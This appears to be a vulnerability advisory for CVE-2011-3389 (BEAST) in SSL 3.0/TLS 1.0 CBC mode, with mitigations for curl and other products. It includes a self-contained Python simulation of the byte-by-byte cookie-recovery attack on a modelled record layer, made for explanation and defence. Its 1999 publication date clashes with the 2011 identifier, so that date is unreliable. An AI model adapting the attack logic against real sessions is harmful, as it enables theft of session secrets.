PT-2011-1174
Credits: Jan Lieskovsky +2
Published 1999-01-01 · Updated 2026-03-01
CVE-2011-3389
CVSS v2.0 7.5 High
| Vector | AV:N/AC:L/Au:N/C:P/I:P/A:P |
Name of the Vulnerable Software and Affected Versions
curl versions prior to 7.24.0
Oracle (affected versions not specified)
Description
CVE-2011-3389 is the "BEAST" weakness in SSL 3.0 and TLS 1.0. In CBC cipher suites these protocol versions use the last ciphertext block of the previous record as the initialization vector for the next record, so a man-in-the-middle who can read the ciphertext knows the IV before the next record is sent. Combined with a way to make the victim's browser send requests whose plaintext the attacker partly controls (the original attack used JavaScript together with the HTML5 WebSocket API, the Java URLConnection API or the Silverlight WebClient API), this allows a blockwise chosen-boundary attack: the attacker aligns one unknown byte of a secret carried in the HTTP headers (typically a session cookie) at the end of a cipher block, then sends chosen records that each test one guess for that byte, recovering the secret byte by byte over many requests. The SSL/TLS implementations used in Microsoft Windows, Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, the curl library and the Oracle products listed below are affected. Exploitation is remote but requires an on-path (man-in-the-middle) position; the direct impact is disclosure of data protected by the HTTPS session, which can lead to further loss of confidentiality, integrity and availability of the protected information (for example through session hijacking with the recovered cookie).
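The following model of the attack is an added example; it is not code from the advisory or from any of the affected products. It models TLS 1.0 CBC chaining (MAC and real padding are omitted) with a stand-in block cipher (HMAC-SHA256 truncated to one block, an assumption made so the example needs no third-party library), a victim that appends a secret cookie to every attacker-chosen request, and an attacker who recovers the cookie one byte per block alignment. The same attacker is then run against a record layer with TLS 1.1-style per-record IVs, where no guess ever matches.

```python
"""Added example: BEAST blockwise chosen-boundary attack against chained CBC IVs."""
import hashlib
import hmac
import os

BLOCK = 16


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for a 16-byte block cipher such as AES-128 (assumption: a keyed PRF,
    HMAC-SHA256 truncated to one block). The attack only needs the cipher to be a
    deterministic keyed function of its input block."""
    assert len(block) == BLOCK
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def split_blocks(data: bytes) -> list:
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


class CbcRecordLayer:
    """CBC encryption of records (MAC and padding left out for clarity).
    per_record_iv=False: TLS 1.0 / SSL 3.0, the IV of record n is the last ciphertext
    block of record n-1, so an on-path attacker knows it before record n is sent.
    per_record_iv=True: TLS 1.1+, a fresh random IV per record, sent in the clear."""

    def __init__(self, key: bytes, per_record_iv: bool):
        self.key = key
        self.per_record_iv = per_record_iv
        self.chain = os.urandom(BLOCK)  # TLS 1.0: initial IV comes from the handshake

    def send(self, plaintext: bytes) -> bytes:
        assert len(plaintext) % BLOCK == 0
        if self.per_record_iv:
            self.chain = os.urandom(BLOCK)
        prev = self.chain
        out = [prev] if self.per_record_iv else []
        for p in split_blocks(plaintext):
            prev = block_encrypt(self.key, xor(p, prev))
            out.append(prev)
        self.chain = prev
        return b"".join(out)


class Victim:
    """The victim browser: attacker-supplied script chooses the request bytes and the
    browser appends the secret (a session cookie, constructed here) to every request."""

    def __init__(self, key: bytes, secret: bytes, per_record_iv: bool):
        self.layer = CbcRecordLayer(key, per_record_iv)
        self.secret = secret
        self.requests = 0

    def request(self, attacker_bytes: bytes) -> bytes:
        self.requests += 1
        body = attacker_bytes + self.secret
        body += b"\x00" * (-len(body) % BLOCK)  # simplified padding
        return self.layer.send(body)


def beast_recover(victim: Victim, secret_len: int) -> bytes:
    """Attacker: sees every ciphertext (MITM) and chooses each request's plaintext.
    Returns the recovered bytes; stops early once a byte cannot be found."""
    recovered = b""
    last_block = victim.request(b"")[-BLOCK:]  # warm-up: from now on every IV is known
    for k in range(secret_len):
        # Prefix length chosen so secret[k] is the last byte of a block whose other
        # 15 bytes (prefix and already recovered secret bytes) are known.
        prefix = b"A" * ((BLOCK - 1 - k) % BLOCK)
        ct = victim.request(prefix)
        blocks = [last_block] + split_blocks(ct)  # blocks[j] is the IV of ct block j
        i = (len(prefix) + k - (BLOCK - 1)) // BLOCK  # plaintext block ending in secret[k]
        c_prev, c_target = blocks[i], blocks[i + 1]
        last_block = blocks[-1]
        known15 = (prefix + recovered)[-(BLOCK - 1):]
        found = None
        for g in range(256):
            guess = known15 + bytes([g])
            # Next record's first block is E(probe xor last_block). Choose probe so that
            # probe xor last_block == guess xor c_prev: same cipher input as the target
            # block iff the guess is right, hence the same ciphertext block.
            probe = xor(xor(guess, c_prev), last_block)
            ct2 = victim.request(probe)
            last_block = ct2[-BLOCK:]
            if ct2[:BLOCK] == c_target:
                found = g
                break
        if found is None:
            break
        recovered += bytes([found])
    return recovered


def demo(secret: bytes = b"sid=s3cr3t", per_record_iv: bool = False):
    """Run the attack against a fresh victim; returns (recovered bytes, requests used)."""
    victim = Victim(os.urandom(BLOCK), secret, per_record_iv)
    return beast_recover(victim, len(secret)), victim.requests


if __name__ == "__main__":
    rec, n = demo()
    print(f"TLS 1.0 chained IVs: recovered {rec!r} in {n} requests")
    rec, n = demo(per_record_iv=True)
    print(f"TLS 1.1 per-record IVs: recovered {rec!r} (attack fails)")
```

Each secret byte costs at most 256 requests plus one alignment request, which is why the real attack needs a channel (WebSocket, Java, Silverlight) that can issue many requests with attacker-controlled bytes in front of the cookie. With per-record IVs the attacker cannot predict the IV when crafting the probe, so the equality in the inner loop never holds and `beast_recover` returns nothing.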
Recommendations
For curl versions prior to 7.24.0, update to version 7.24.0 or later. Earlier versions turned off the SSL library's countermeasure against this attack by default; later releases also provide an explicit opt-out (--ssl-allow-beast / CURLSSLOPT_ALLOW_BEAST) for servers that cannot handle the countermeasure, which should only be used where such a server makes it unavoidable.
For Oracle products, this page records no version containing a fix; consult the vendor's advisories for the affected Java and Oracle Database releases.
As a workaround, avoid CBC mode with chained initialization vectors, i.e. SSL 3.0 and TLS 1.0 CBC cipher suites: configure clients and servers to negotiate TLS 1.1 or later, which uses an explicit per-record IV. Where TLS 1.0 cannot yet be disabled, rely on client-side record splitting (the 1/n-1 split implemented by browsers and TLS libraries) rather than on preferring RC4, since RC4 is itself broken and its use in TLS is prohibited by RFC 7465.
Restrict access to sensitive data and limit what an attacker gains from a recovered header: use short-lived session cookies and require re-authentication for sensitive operations.
Weakness
Inadequate Encryption Strength (CWE-326)
Related identifiers
Affected products
Debian
Google Chrome
Hp-Ux
Java
Java Platform
Internet Explorer
Windows
Firefox
Opera
Oracle
Oracle Database
Red Hat
Silverlight
Suse
Curl